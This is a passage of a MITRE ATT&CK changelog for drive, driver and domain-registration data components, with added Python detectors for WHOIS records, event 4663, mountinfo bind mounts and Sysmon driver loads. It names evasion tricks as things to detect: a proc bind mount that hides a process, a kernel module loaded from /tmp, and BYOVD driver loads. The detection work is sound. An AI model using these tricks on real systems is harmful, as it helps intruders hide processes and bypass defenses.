x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
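The Domain Registration examples above (a domain registered a week before use, `clientTransferProhibited` or `serverHold` status codes, WHOIS privacy protection) are signals derived from a raw WHOIS record. The following is an added example, not code from the ATT&CK changelog or from MITRE, that parses the common `Key: value` WHOIS layout and derives those signals relative to the time the domain was observed. The WHOIS text is constructed, and the 30-day threshold for "newly registered" is an assumption.

```python
"""Turn a WHOIS registration record into enrichment signals.

Added example (not ATT&CK's own code) for the Domain Registration data
component. It parses the key/value WHOIS format, keeps multi-valued fields such
as Domain Status and Name Server, and derives domain age at observation time,
hold/lock status codes and privacy-protected registrant data. The record is
constructed; the 30-day "newly registered" threshold is an assumption.
"""
from datetime import datetime, timezone, timedelta

SAMPLE_WHOIS = """\
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, LLC
Creation Date: 2025-03-10T08:15:00Z
Updated Date: 2025-03-10T08:15:00Z
Registry Expiry Date: 2026-03-10T08:15:00Z
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverHold https://icann.org/epp#serverHold
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy Protect Service
Name Server: NS1.EXAMPLE-DNS.NET
Name Server: NS2.EXAMPLE-DNS.NET
DNSSEC: unsigned
>>> Last update of whois database: 2025-03-17T12:00:00Z <<<
"""

MULTI_VALUED = {"domain status", "name server"}
PRIVACY_MARKERS = ("redacted", "privacy", "proxy")
HOLD_STATUSES = {"serverhold", "clienthold"}
NEW_DOMAIN_AGE = timedelta(days=30)  # assumption; tune to the environment's false-positive tolerance


def parse_whois(text):
    """Parse 'Key: value' lines; repeated keys in MULTI_VALUED become lists."""
    record = {}
    for line in text.splitlines():
        if line.startswith(">>>") or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if not value:
            continue
        if key in MULTI_VALUED:
            record.setdefault(key, []).append(value.split()[0])  # drop the EPP URL after a status code
        else:
            record.setdefault(key, value)  # first occurrence wins
    return record


def _parse_date(value):
    if not value:
        return None
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%d"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            pass
    return None  # registrar-specific formats exist; leave unknown rather than guess


def enrich(record, observed_at):
    """Derive the signals the data component lists, relative to when the domain was seen."""
    created = _parse_date(record.get("creation date"))
    expires = _parse_date(record.get("registry expiry date") or record.get("expiry date"))
    statuses = [s.lower() for s in record.get("domain status", [])]
    registrant = " ".join(v for k, v in record.items()
                          if k.startswith("registrant ") and isinstance(v, str)).lower()
    return {
        "domain": record.get("domain name", "").lower(),
        "age_days": (observed_at - created).days if created else None,
        "newly_registered": created is not None and observed_at - created <= NEW_DOMAIN_AGE,
        "days_to_expiry": (expires - observed_at).days if expires else None,
        "on_hold": any(s in HOLD_STATUSES for s in statuses),
        "transfer_locked": "clienttransferprohibited" in statuses,
        "privacy_protected": any(m in registrant for m in PRIVACY_MARKERS),
        "name_servers": [ns.lower() for ns in record.get("name server", [])],
    }


def enrich_whois_text(text, observed_at_iso):
    """Convenience wrapper: raw WHOIS text plus the first-seen time as an ISO 8601 UTC string."""
    return enrich(parse_whois(text), _parse_date(observed_at_iso))


if __name__ == "__main__":
    print(enrich_whois_text(SAMPLE_WHOIS, "2025-03-17T12:00:00Z"))  # constructed first-seen time
```

`age_days` is computed against the observation time rather than "now" so that the signal is stable when an event is triaged days later; an unparseable date yields `None` rather than a misleading age.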
Drive: Drive Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:42.387Z |
description | Opening of a data storage device with an assigned drive letter or mount point | Refers to the act of accessing a data storage device, such as a hard drive, SSD, USB, or network-mounted drive. This data component logs the opening or mounting of drives, capturing activities such as reading, writing, or executing files within an assigned drive letter (e.g., `C:\`, `/mnt/drive`) or mount point. Examples:
- Removable Drive Insertion: A USB drive is inserted, assigned the letter `F:\`, and files are accessed.
- Network Drive Mounting: A network share `\\server\share` is mapped to the drive `Z:\`.
- External Hard Drive Access: An external drive is connected, mounted at `/mnt/backup`, and accessed for copying files.
- System Volume Access: The system volume `C:\` is accessed for modifications to critical files.
- Cloud-Synced Drives: Cloud storage drives like OneDrive or Google Drive are accessed via local mounts.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 4663: Logs access to file or folder objects.
- Event ID 4656: Tracks a handle to an object like a drive or file.
- Configuration:
- Enable auditing for "Object Access" in Local Security Policy.
- Use Group Policy for broader deployment: `Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Object Access`
Linux System Logs
- Command-Line Monitoring: Use the `dmesg` or `journalctl` command to monitor drive mount/unmount events.
- Auditd Configuration: Add an audit rule for drive access: `auditctl -w /mnt/drive -p rwxa -k drive_access`
- Review logs via `/var/log/audit/audit.log`.
macOS System Logs
- Command-Line Monitoring: Use `diskutil list` or `fs_usage` to monitor drive access and mount points.
- Unified Logs: Query unified logs using log show for drive-related activities: `log show --info | grep "mount"`
Endpoint Detection and Response (EDR) Tools
- Use EDR solutions to monitor drive activities and collect detailed forensic data.
SIEM Tools
- Ingest logs from endpoints to detect drive access patterns. Configure rules to alert on unusual or unauthorized drive access. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
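The Drive Access entry names Event ID 4663 as the Windows source and asks for alerts on unusual drive access, but a 4663 record carries a numeric `AccessMask` and a full `ObjectName`, so reducing it to "which drive, which operation" is the first step of any such rule. The following is an added example, not code from the ATT&CK changelog or from MITRE: it decodes the access mask, reduces the path to its drive letter or UNC share, and flags writes and executions on removable or unknown drives. The events are constructed in the shape of a JSON export of the 4663 `EventData` fields, and the drive inventory is an assumed per-host mapping built from the page's own examples (`C:\` system, `F:\` removable, `Z:\` and `\\server\share` network).

```python
r"""Summarize drive access from Windows Security event 4663 records.

Added example (not ATT&CK's own code) for the Drive Access data component. The
events are constructed in the shape of a JSON export of the 4663 EventData
fields; DRIVE_INVENTORY is an assumed per-host mapping of drive roots to classes
and ALERT_OPS is an assumed alerting policy.
"""

# Low-order generic file access rights as they appear in the 4663 AccessMask.
ACCESS_BITS = {0x1: "read", 0x2: "write", 0x4: "append", 0x20: "execute",
               0x40: "delete_child", 0x10000: "delete"}

# Assumed inventory: which roots are system, removable or network drives on this host.
DRIVE_INVENTORY = {"C:": "system", "F:": "removable", "Z:": "network",
                   r"\\server\share": "network"}

# Assumed policy: these operations on removable or unknown drives raise an alert.
ALERT_OPS = {"write", "append", "execute", "delete"}

SAMPLE_EVENTS = [  # constructed
    {"EventID": 4663, "SubjectUserName": "jdoe", "ObjectType": "File",
     "ObjectName": r"F:\exports\customer_list.xlsx", "AccessMask": "0x2",
     "ProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4663, "SubjectUserName": "jdoe", "ObjectType": "File",
     "ObjectName": r"C:\Users\jdoe\notes.txt", "AccessMask": "0x1",
     "ProcessName": r"C:\Windows\notepad.exe"},
    {"EventID": 4663, "SubjectUserName": "svc_backup", "ObjectType": "File",
     "ObjectName": r"\\server\share\backup\db.bak", "AccessMask": "0x1",
     "ProcessName": r"C:\Program Files\Backup\agent.exe"},
    {"EventID": 4663, "SubjectUserName": "jdoe", "ObjectType": "File",
     "ObjectName": r"F:\tools\run.exe", "AccessMask": "0x21",
     "ProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4663, "SubjectUserName": "jdoe", "ObjectType": "File",
     "ObjectName": r"X:\scratch\dump.bin", "AccessMask": "0x2",
     "ProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4656, "SubjectUserName": "jdoe", "ObjectType": "File",
     "ObjectName": r"F:\tools\run.exe", "AccessMask": "0x20",
     "ProcessName": r"C:\Windows\explorer.exe"},
]


def decode_access_mask(mask):
    """AccessMask is logged as a hex string such as "0x2"; return the named operations."""
    value = int(mask, 16) if isinstance(mask, str) else int(mask)
    return [name for bit, name in sorted(ACCESS_BITS.items()) if value & bit]


def drive_root(object_name):
    r"""Reduce a path to its drive letter ("F:") or UNC share (\\server\share)."""
    if object_name.startswith("\\\\"):
        parts = object_name.split("\\")  # ['', '', 'server', 'share', ...]
        return "\\\\" + "\\".join(parts[2:4]) if len(parts) >= 4 else None
    if len(object_name) >= 2 and object_name[1] == ":" and object_name[0].isalpha():
        return object_name[:2].upper()
    return None  # kernel paths such as \Device\HarddiskVolume3\... need separate resolution


def summarize_drive_access(events, inventory=DRIVE_INVENTORY):
    """One finding per 4663 record whose object lives on a recognisable drive root."""
    findings = []
    for event in events:
        if event.get("EventID") != 4663:
            continue  # 4656 is only the handle request; 4663 records the access that happened
        root = drive_root(event.get("ObjectName", ""))
        if root is None:
            continue
        findings.append({
            "user": event.get("SubjectUserName"),
            "root": root,
            "drive_class": inventory.get(root, "unknown"),
            "ops": decode_access_mask(event.get("AccessMask", "0x0")),
            "object": event.get("ObjectName"),
            "process": event.get("ProcessName"),
        })
    return findings


def flag_suspicious(findings):
    """Apply the assumed policy: alert-worthy operations on removable or unknown drives."""
    return [f for f in findings
            if f["drive_class"] in ("removable", "unknown") and ALERT_OPS & set(f["ops"])]


if __name__ == "__main__":
    for alert in flag_suspicious(summarize_drive_access(SAMPLE_EVENTS)):
        print(alert["user"], alert["root"], alert["drive_class"], alert["ops"], alert["object"])
```

Object Access auditing produces one 4663 per access, so in practice the findings are aggregated per user and root over a time window before alerting; the unknown-root case (`X:` here) is kept as an alert because a drive root missing from the inventory usually means a newly mapped or inserted device, which is the Drive Creation component's territory.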
Drive: Drive Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:36.536Z |
description | Initial construction of a drive letter or mount point to a data storage device | The activity of assigning a new drive letter or creating a mount point for a data storage device, such as a USB, network share, or external hard drive, enabling access to its content on a host system. Examples:
- USB Drive Insertion: A USB drive is plugged in and automatically assigned the letter `E:\` on a Windows machine.
- Network Drive Mapping: A network share `\\server\share` is mapped to the drive `Z:\`.
- Virtual Drive Creation: A virtual disk is mounted on `/mnt/virtualdrive` using an ISO image or a virtual hard disk (VHD).
- Cloud Storage Mounting: Google Drive is mounted as `G:\` on a Windows machine using a cloud sync tool.
- External Storage Integration: An external HDD or SSD is connected and assigned `/mnt/external` on a Linux system.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Logs the creation of a volume (mount or new drive letter assignment).
- Event ID 1006: Logs removable storage device insertions.
- Configuration: Enable "Removable Storage Events" in the Group Policy settings:
`Computer Configuration > Administrative Templates > System > Removable Storage Access`
Linux System Logs
- Command-Line Monitoring: Use `dmesg` or `journalctl` to monitor mount events.
- Auditd Configuration: Add audit rules to track mount points.
- Logs can be reviewed in /var/log/audit/audit.log.
macOS System Logs
- Unified Logs: Monitor system logs for mount activity:
- Command-Line Tools: Use `diskutil list` to verify newly created or mounted drives.
Endpoint Detection and Response (EDR) Tools
- EDR solutions can log removable drive usage and network-mounted drives. Configure EDR policies to alert on suspicious drive creation events.
SIEM Tools
- Centralize logs from multiple platforms into a SIEM (e.g., Splunk) to correlate and alert on suspicious drive creation activities. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:35.797Z |
description | Changes made to a drive letter or mount point of a data storage device | The alteration of a drive letter, mount point, or other attributes of a data storage device, which could involve reassignment, renaming, permissions changes, or other modifications. Examples:
- Drive Letter Reassignment: A USB drive previously assigned `E:\` is reassigned to `D:\` on a Windows machine.
- Mount Point Change: On a Linux system, a mounted storage device at `/mnt/external` is moved to `/mnt/storage`.
- Drive Permission Changes: A shared drive's permissions are modified to allow write access for unauthorized users or processes.
- Renaming of a Drive: A network drive labeled "HR_Share" is renamed to "Shared_Resources."
- Modification of Cloud-Integrated Drives: A cloud storage mount such as Google Drive is modified to sync only specific folders.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Indicates changes to a volume (e.g., drive letter reassignment).
- Event ID 1006: Logs permission modifications or changes to removable storage.
- Configuration: Enable "Storage Operational Logs" in the Event Viewer:
`Applications and Services Logs > Microsoft > Windows > Storage-Tiering > Operational`
Linux System Logs
- Auditd Configuration: Add audit rules to track changes to mounted drives: `auditctl -w /mnt/ -p w -k drive_modification`
- Command-Line Monitoring: Use `dmesg` or `journalctl` to observe drive modifications.
macOS System Logs
- Unified Logs: Collect mount or drive modification events: `log show --info | grep "Volume modified"`
- Command-Line Monitoring: Use `diskutil list` to enumerate current volumes and mount points and compare the output against a known baseline.
Endpoint Detection and Response (EDR) Tools
- Configure policies in EDR solutions to monitor and log changes to drive configurations or attributes.
SIEM Tools
- Aggregate logs from multiple systems into a centralized platform like Splunk to correlate events and alert on suspicious drive modification activities.
|
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
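The Linux "Mount Point Change" example above is only detectable if you keep a baseline of what was mounted where. The following added example (not part of the ATT&CK changelog or MITRE's data) parses two constructed `/proc/self/mountinfo` snapshots, reports every device whose set of mount points changed, and separately flags bind mounts of the proc filesystem over a `/proc/<pid>` directory, the overlay pattern described under Hide Artifacts: Bind Mounts at the top of this page. The snapshot contents, PIDs and device names are constructed for illustration.

```python
"""Detect mount-point changes and suspicious bind mounts by parsing /proc/self/mountinfo.

Added example for the Drive Modification data component; not part of the ATT&CK page.
Both snapshots below are constructed, not captured from a real host.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Baseline snapshot: /dev/sdb1 mounted at /mnt/external (constructed).
BASELINE_MOUNTINFO = """\
22 28 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw
28 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
41 28 8:17 / /mnt/external rw,relatime shared:20 - ext4 /dev/sdb1 rw
"""

# Later snapshot: the same device now sits at /mnt/storage, and /proc/1 has been
# bind-mounted over /proc/4242 (root field "/1" inside the proc filesystem). Constructed.
CURRENT_MOUNTINFO = """\
22 28 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw
28 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
57 28 8:17 / /mnt/storage rw,relatime shared:20 - ext4 /dev/sdb1 rw
83 22 0:21 /1 /proc/4242 rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw
"""

PROC_PID_RE = re.compile(r"^/proc/\d+(/|$)")


@dataclass
class Mount:
    mount_id: int
    parent_id: int
    root: str         # subtree of the filesystem mounted here; "/" unless bind mount (or subvolume)
    mount_point: str
    fstype: str
    source: str


def parse_mountinfo(text: str) -> List[Mount]:
    """Parse mountinfo lines. The optional fields end at the literal ' - ' separator."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pre, _, post = line.partition(" - ")
        p, q = pre.split(), post.split()
        # p: mount id, parent id, major:minor, root, mount point, options, optional fields...
        # q: fstype, source, super options
        mounts.append(Mount(int(p[0]), int(p[1]), p[3], p[4], q[0], q[1]))
    return mounts


def find_suspicious(mounts: List[Mount]) -> List[Tuple[str, str]]:
    """Flag proc bind mounts over /proc/<pid>, then any other non-root bind mount."""
    findings = []
    for m in mounts:
        if m.fstype == "proc" and PROC_PID_RE.match(m.mount_point):
            findings.append(("proc_pid_overlay", m.mount_point))
        elif m.root != "/":
            # Caveat: btrfs subvolumes also show a non-"/" root; allow-list those by source/fstype.
            findings.append(("bind_mount", m.mount_point))
    return findings


def mount_point_changes(before: List[Mount], after: List[Mount]) -> List[Tuple[str, List[str], List[str]]]:
    """Return (source, old mount points, new mount points) for each source whose mount points changed."""
    def table(ms: List[Mount]) -> Dict[str, Set[str]]:
        t: Dict[str, Set[str]] = {}
        for m in ms:
            t.setdefault(m.source, set()).add(m.mount_point)
        return t
    b, a = table(before), table(after)
    changes = []
    for src in sorted(set(b) | set(a)):
        if b.get(src, set()) != a.get(src, set()):
            changes.append((src, sorted(b.get(src, set())), sorted(a.get(src, set()))))
    return changes


if __name__ == "__main__":
    # On a live host: parse_mountinfo(open("/proc/self/mountinfo").read())
    cur = parse_mountinfo(CURRENT_MOUNTINFO)
    print(find_suspicious(cur))
    print(mount_point_changes(parse_mountinfo(BASELINE_MOUNTINFO), cur))
```

Run it periodically (or from a `mount` auditd rule) and diff against the stored baseline; the `proc_pid_overlay` check fires on the exact mount shape an adversary needs to hide a process from `ps` and `top`, while the baseline diff catches the quieter case of a device simply appearing at a new path.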
Driver: Driver Load
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
Old description: Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)
New description: The process of attaching a driver, which is a software component that allows the operating system and applications to interact with hardware devices, to either user-mode or kernel-mode of a system. This can include benign actions (e.g., hardware drivers) or malicious behavior (e.g., rootkits or unsigned drivers). Examples:
- Legitimate Driver Loading: A new graphics driver from a vendor like NVIDIA or AMD is loaded into the system.
- Unsigned Driver Loading: A driver without a valid digital signature is loaded into the kernel.
- Rootkit Installation: A malicious rootkit driver is loaded to manipulate kernel-mode processes.
- Anti-Virus or EDR Driver Loading: An Endpoint Detection and Response (EDR) solution loads its driver to monitor system activities.
- Driver Misuse: A legitimate driver is loaded and exploited to execute malicious actions, such as using vulnerable drivers for bypassing defenses (e.g., Bring Your Own Vulnerable Driver (BYOVD) attacks).
This data component can be collected through the following measures:
Windows
- Sysmon Logs:
  - Event ID 6: Captures driver loading activity, including file path, hashes, and signature information.
  - Configuration: Ensure Sysmon is configured with a ruleset that monitors driver loading events.
- Windows Event Logs: System Event ID 7045 and Security Event ID 4697 record a new kernel driver service being installed; the Microsoft-Windows-CodeIntegrity/Operational channel records drivers that fail signature or policy checks.
Linux
- Auditd: Configure audit rules to capture driver loading events: `auditctl -w /lib/modules/ -p rwxa -k driver_load`. A path watch only sees modules read from that tree; to catch modules loaded from elsewhere (e.g., `insmod /tmp/x.ko`), also audit the syscalls themselves: `auditctl -a always,exit -F arch=b64 -S init_module -S finit_module -S delete_module -k driver_load`
- Kernel Logs (dmesg): Use dmesg to monitor driver-related activities: `dmesg | grep "module"`
- Syslog or journald: Review logs for module insertion or removal activities.
macOS
- Unified Logs: Use the macOS unified logging system to monitor kext (kernel extension) loads: `log show --predicate 'eventMessage contains "kext load"'`
- Endpoint Security Framework: Monitor driver loading via third-party security tools that leverage Apple's Endpoint Security Framework.
SIEM Tools
- Ingest driver load logs from Sysmon, Auditd, or macOS unified logs into a centralized SIEM (e.g., Splunk).
- Create rules to detect unsigned drivers, rootkit activity, or known vulnerable drivers.
EDR Solutions
- Use EDR tools to detect and alert on anomalous driver loading activity.
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:49.173Z |
description | Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6) | The process of attaching a driver, which is a software component that allows the operating system and applications to interact with hardware devices, to either user-mode or kernel-mode of a system. This can include benign actions (e.g., hardware drivers) or malicious behavior (e.g., rootkits or unsigned drivers). Examples:
- Legitimate Driver Loading: A new graphics driver from a vendor like NVIDIA or AMD is loaded into the system.
- Unsigned Driver Loading: A driver without a valid digital signature is loaded into the kernel.
- Rootkit Installation: A malicious rootkit driver is loaded to manipulate kernel-mode processes.
- Anti-Virus or EDR Driver Loading: An Endpoint Detection and Response (EDR) solution loads its driver to monitor system activities.
- Driver Misuse: A legitimate driver is loaded and exploited to execute malicious actions, such as using vulnerable drivers for bypassing defenses (e.g., Bring Your Own Vulnerable Driver (BYOVD) attacks).
This data component can be collected through the following measures:
Windows
- Sysmon Logs:
- Event ID 6: Captures driver loading activity, including file path, hashes, and signature information.
- Configuration: Ensure Sysmon is configured with a ruleset that monitors driver loading events.
- Windows Event Logs: System Event ID 7045 and Security Event ID 4697 record a new kernel driver service being installed; the Microsoft-Windows-CodeIntegrity/Operational channel records drivers that fail signature or policy checks.
Linux
- Auditd: Configure audit rules to capture driver loading events: `auditctl -w /lib/modules/ -p rwxa -k driver_load`. A path watch only sees modules read from that tree; to catch modules loaded from elsewhere (e.g., `insmod /tmp/x.ko`), also audit the syscalls themselves: `auditctl -a always,exit -F arch=b64 -S init_module -S finit_module -S delete_module -k driver_load`
- Kernel Logs (dmesg): Use dmesg to monitor driver-related activities: `dmesg | grep "module"`
- Syslog or journald: Review logs for module insertion or removal activities.
macOS
- Unified Logs: Use the macOS unified logging system to monitor kext (kernel extension) loads:
`log show --predicate 'eventMessage contains "kext load"'`
- Endpoint Security Framework: Monitor driver loading via third-party security tools that leverage Apple’s Endpoint Security Framework.
SIEM Tools
- Ingest driver load logs from Sysmon, Auditd, or macOS unified logs into a centralized SIEM (e.g., Splunk).
- Create rules to detect unsigned drivers, rootkit activity, or known vulnerable drivers.
EDR Solutions
- Use EDR tools to detect and alert on anomalous driver loading activity. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Driver: Driver Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
Old description: Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking
New description: Refers to contextual data about a driver, including its attributes, functionality, and activity. This can involve details such as the driver's origin, integrity, cryptographic signature, issues reported during its use, and runtime behavior. Examples include metadata captured during driver integrity checks, hash validation, or error reporting. Examples:
- Driver Signature Validation: A driver is validated to ensure it is signed by a trusted Certificate Authority (CA).
- Driver Hash Verification: The hash of a driver is compared to a known good hash stored in a database.
- Driver Compatibility Issues: A driver error is logged due to compatibility issues with a particular version of the operating system.
- Vulnerable Driver Identification: Metadata indicates the driver version is outdated or contains a known vulnerability.
- Monitoring Driver Integrity: Drivers are monitored for any unauthorized modifications to their binary or associated files.
This data component can be collected through the following measures:
Windows
- Windows Event Logs:
  - Event ID 3000-3006: Logs metadata about driver signature validation.
  - Event ID 2000-2011 (Windows Defender Application Control): Tracks driver integrity and policy enforcement.
- Sysmon Logs: Configure Sysmon to capture driver loading metadata (Event ID 6).
- Driver Verifier: Use Driver Verifier to collect diagnostic and performance data about drivers, including stability and compatibility metrics.
- PowerShell: Use commands to retrieve metadata about installed drivers: `Get-WindowsDriver -Online | Select-Object Driver, ProviderName, Version`
Linux
- Auditd: Configure audit rules to monitor driver interactions and collect metadata: `auditctl -w /lib/modules/ -p rwxa -k driver_metadata`
- dmesg: Use `dmesg` to extract kernel logs with driver metadata: `dmesg | grep "module"`
- lsmod and modinfo: Commands to list loaded modules and retrieve metadata about drivers: `lsmod` | `modinfo <module_name>`
macOS
- Unified Logs: Collect metadata from system logs about kernel extensions (kexts): `log show --predicate 'eventMessage contains "kext load"' --info`
- kextstat: Command to retrieve information about loaded kernel extensions: `kextstat`
SIEM Tools
- Ingest Driver Metadata: Collect driver metadata logs from Sysmon, Auditd, or macOS logs into SIEMs like Splunk or Elastic.
Vulnerability Management Tools
- Use these tools to collect metadata about vulnerable drivers across enterprise systems.
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:52.372Z |
description | Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking | Refers to contextual data about a driver, including its attributes, functionality, and activity. This can involve details such as the driver's origin, integrity, cryptographic signature, issues reported during its use, and runtime behavior. Examples include metadata captured during driver integrity checks, hash validation, or error reporting. Examples:
- Driver Signature Validation: A driver is validated to ensure it is signed by a trusted Certificate Authority (CA).
- Driver Hash Verification: The hash of a driver is compared to a known good hash stored in a database.
- Driver Compatibility Issues: A driver error is logged due to compatibility issues with a particular version of the operating system.
- Vulnerable Driver Identification: Metadata indicates the driver version is outdated or contains a known vulnerability.
- Monitoring Driver Integrity: Drivers are monitored for any unauthorized modifications to their binary or associated files.
This data component can be collected through the following measures:
Windows
- Windows Event Logs:
- Event ID 3000-3006: Logs metadata about driver signature validation.
- Event ID 2000-2011 (Windows Defender Application Control): Tracks driver integrity and policy enforcement.
- Sysmon Logs: Configure Sysmon to capture driver loading metadata (Event ID 6).
- Driver Verifier: Use Driver Verifier to collect diagnostic and performance data about drivers, including stability and compatibility metrics.
- PowerShell: Use commands to retrieve metadata about installed drivers:
`Get-WindowsDriver -Online | Select-Object Driver, ProviderName, Version`
Linux
- Auditd: Configure audit rules to monitor driver interactions and collect metadata: `auditctl -w /lib/modules/ -p rwxa -k driver_metadata`
- dmesg: Use `dmesg` to extract kernel logs with driver metadata: `dmesg | grep "module"`
- lsmod and modinfo: Commands to list loaded modules and retrieve metadata about drivers: `lsmod` | `modinfo <module_name>`
macOS
- Unified Logs: Collect metadata from system logs about kernel extensions (kexts): `log show --predicate 'eventMessage contains "kext load"' --info`
- kextstat: Command to retrieve information about loaded kernel extensions: `kextstat`
SIEM Tools
- Ingest Driver Metadata: Collect driver metadata logs from Sysmon, Auditd, or macOS logs into SIEMs like Splunk or Elastic.
Vulnerability Management Tools
- Use these tools to collect metadata about vulnerable drivers across enterprise systems. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
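The Driver Load and Driver Metadata components above both point at Sysmon Event ID 6, which carries the loaded image path, its hashes and its signature status in one record. The following added example (not part of the ATT&CK changelog or MITRE's data) parses three constructed Sysmon-style EID 6 XML records and applies the three checks the text lists: unsigned or invalid signature, hash present on a known-vulnerable (BYOVD) list, and a load from an unexpected path. The event contents, the `KNOWN_VULNERABLE_SHA256` entries and the expected driver directories are assumptions for illustration; the hash in the deny-list is a placeholder, not a real vulnerable-driver hash.

```python
"""Triage Sysmon Event ID 6 (DriverLoad) records for unsigned or known-vulnerable drivers.

Added example; not MITRE's code. Field names follow the real Sysmon EID 6 schema,
but every event, path and hash below is constructed for illustration.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Hypothetical deny-list keyed by SHA256. The entry is a placeholder and NOT a real
# vulnerable-driver hash; in practice populate this from a vetted BYOVD block list.
KNOWN_VULNERABLE_SHA256 = {
    "1" * 64: "example-vuln.sys (constructed)",
}
# Assumed: legitimate kernel drivers live under one of these directories.
EXPECTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")


def _event(utc: str, image: str, sha256: str, signed: str, signature: str, status: str) -> str:
    """Build one constructed Sysmon-style DriverLoad record."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>6</EventID><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="RuleName">-</Data>
    <Data Name="UtcTime">{utc}</Data>
    <Data Name="ImageLoaded">{image}</Data>
    <Data Name="Hashes">SHA256={sha256},IMPHASH={"0" * 32}</Data>
    <Data Name="Signed">{signed}</Data>
    <Data Name="Signature">{signature}</Data>
    <Data Name="SignatureStatus">{status}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    _event("2025-04-18 15:14:49.173", r"C:\Windows\System32\drivers\nvlddmkm.sys", "a" * 64,
           "true", "NVIDIA Corporation", "Valid"),
    _event("2025-04-18 15:15:02.001", r"C:\Users\Public\vendor_util.sys", "1" * 64,
           "true", "Some Vendor", "Valid"),
    _event("2025-04-18 15:15:30.420", r"C:\Windows\Temp\rk.sys", "b" * 64,
           "false", "-", "Unavailable"),
]


def parse_driver_load(xml_text: str) -> Dict[str, str]:
    """Flatten an EID 6 record into {field: value} and split the Hashes field."""
    root = ET.fromstring(xml_text)
    eid = root.findtext("e:System/e:EventID", namespaces=NS)
    if eid != "6":
        raise ValueError(f"not a DriverLoad event (EventID={eid})")
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    hashes = dict(kv.split("=", 1) for kv in data.get("Hashes", "").split(",") if "=" in kv)
    data["SHA256"] = hashes.get("SHA256", "").lower()
    return data


def triage(xml_events: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious load, with every reason that fired."""
    findings = []
    for xml_text in xml_events:
        ev = parse_driver_load(xml_text)
        reasons = []
        if ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus") != "Valid":
            reasons.append("unsigned_or_invalid_signature")
        if ev["SHA256"] in KNOWN_VULNERABLE_SHA256:
            reasons.append("known_vulnerable:" + KNOWN_VULNERABLE_SHA256[ev["SHA256"]])
        if not ev.get("ImageLoaded", "").lower().startswith(EXPECTED_DRIVER_DIRS):
            reasons.append("unusual_path")
        if reasons:
            findings.append({"UtcTime": ev["UtcTime"], "ImageLoaded": ev["ImageLoaded"],
                             "SHA256": ev["SHA256"], "reasons": reasons})
    return findings


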